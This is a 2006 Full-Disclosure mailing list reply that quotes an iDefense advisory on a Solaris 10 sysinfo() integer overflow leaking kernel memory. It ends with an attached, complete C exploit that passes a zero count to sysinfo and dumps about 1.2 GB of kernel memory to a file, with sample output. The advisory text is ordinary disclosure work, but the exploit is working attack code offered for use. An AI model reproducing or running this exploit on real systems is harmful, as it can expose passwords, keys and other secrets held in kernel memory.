Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability

[Micheal Turner <wh1t3h4t3@xxxxxxxxxxx>]

Exploit has been attached as problems with site
hosting over weekend.

--- Micheal Turner <wh1t3h4t3@xxxxxxxxxxx> wrote:

>
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
> 
> --- labs-no-reply <labs-no-reply@xxxxxxxxxxxx>
> wrote:
> 
> > Sun Microsystems Solaris sysinfo() Kernel Memory
> > Disclosure Vulnerability
> > 
> > iDefense Security Advisory 07.20.06
> >
>
http://www.idefense.com/application/poi/display?type=vulnerabilities
> > July 20, 2006
> > 
> > I. BACKGROUND
> > 
> > Solaris is a UNIX operating system developed by
> Sun
> > Microsystems.
> > 
> > II. DESCRIPTION
> > 
> > Local exploitation of an integer overflow
> > vulnerability in Sun
> > Microsystems Inc. Solaris allows attackers to read
> > kernel memory from a
> > non-privileged userspace process.
> > 
> > The vulnerability specifically exists due to an
> > integer overflow in
> > /usr/src/uts/common/syscall/systeminfo.c. The
> > vulnerable code is as
> > follows:
> > 
> > 125     if (kstr != NULL) {
> > 126         if ((strcnt = strlen(kstr)) >= count)
> {
> > 127             getcnt = count - 1;
> > 128             if (subyte(buf + count - 1, 0) <
> 0)
> > 129                 return (set_errno(EFAULT));
> > 130         } else
> > 131             getcnt = strcnt + 1;
> > 132         if (copyout(kstr, buf, getcnt))
> > 133             return (set_errno(EFAULT));
> > 134         return (strcnt + 1);
> > 135     }
> > 
> > 
> > If the variable count (which is a value provided
> by
> > the user invoking
> > the function) is 0, the function will call the
> > copyout function with a
> > length argument of -1. Because copyout interprets
> > the length argument as
> > an unsigned integer, a large amount of data will
> be
> > copied out to
> > userspace, well beyond the boundaries that are
> > intended.
> > 
> > III. ANALYSIS
> > 
> > Successful exploitation of this vulnerability
> allows
> > attackers to read
> > sensitive kernel memory. This can lead to the
> > compromise of passwords or
> > keys. It can also aid an attacker in gathering
> > information for
> > exploitation of other kernel level
> vulnerabilities.
> > 
> > IV. DETECTION
> > 
> > iDefense has confirmed that Solaris 10 is
> > vulnerable. Earlier versions
> > of Solaris are not affected.
> > 
> > V. WORKAROUND
> > 
> > iDefense is currently unaware of any workaround
> for
> > this issue.
> > 
> > VI. VENDOR RESPONSE
> > 
> > Sun Alert ID 102343 addresses this issue and is
> > available at:
> > 
> >    
> >
>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
> > 
> > VII. CVE INFORMATION
> > 
> > A Mitre Corp. Common Vulnerabilities and Exposures
> > (CVE) number has not
> > been assigned yet.
> > 
> > VIII. DISCLOSURE TIMELINE
> > 
> > 12/15/2005  Initial vendor notification
> > 12/15/2005  Initial vendor response
> > 07/20/2006  Coordinated public disclosure
> > 
> > IX. CREDIT
> > 
> > The discoverer of this vulnerability wishes to
> > remain anonymous.
> > 
> > Get paid for vulnerability research
> > http://www.idefense.com/poi/teams/vcp.jsp
> > 
> > Free tools, research and upcoming events
> > http://labs.idefense.com
> > 
> > X. LEGAL NOTICES
> > 
> > Copyright © 2006 iDefense, Inc.
> > 
> > Permission is granted for the redistribution of
> this
> > alert
> > electronically. It may not be edited in any way
> > without the express
> > written consent of iDEFENSE. If you wish to
> reprint
> > the whole or any
> > part of this alert in any other medium other than
> > electronically, please
> > email customerservice@xxxxxxxxxxxx for permission.
> > 
> > Disclaimer: The information in the advisory is
> > believed to be accurate
> > at the time of publishing based on currently
> > available information. Use
> > of the information constitutes acceptance for use
> in
> > an AS IS condition.
> > There are no warranties with regard to this
> > information. Neither the
> > author nor the publisher accepts any liability for
> > any direct, indirect,
> > or consequential loss or damage arising from use
> of,
> > or reliance on,
> > this information.
> > 
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> >
>
http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/
> > 
> 
> 
> 
>               
>
___________________________________________________________
> 
> The all-new Yahoo! Mail goes wherever you go - free
> your email address from your Internet provider.
> http://uk.docs.yahoo.com/nowyoucan.html
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
> 


                
___________________________________________________________ 
The all-new Yahoo! Mail goes wherever you go - free your email address from 
your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html

/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
        int fd;
        ssize_t out;
        char* output_buffer;
        if(argc < 2){
                printf("[ Use with <filepath>\n");
                exit(1);
        }
        printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
        output_buffer = malloc(bufsize);
        memset(output_buffer,0,bufsize);
        sysinfo(SI_SYSNAME,output_buffer,0);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
        if(fd){
                out = write(fd,output_buffer,bufsize);
                printf("[ Wrote %u bytes to %s\n",out,argv[1]);
                close(fd);
        }
        exit(0);
}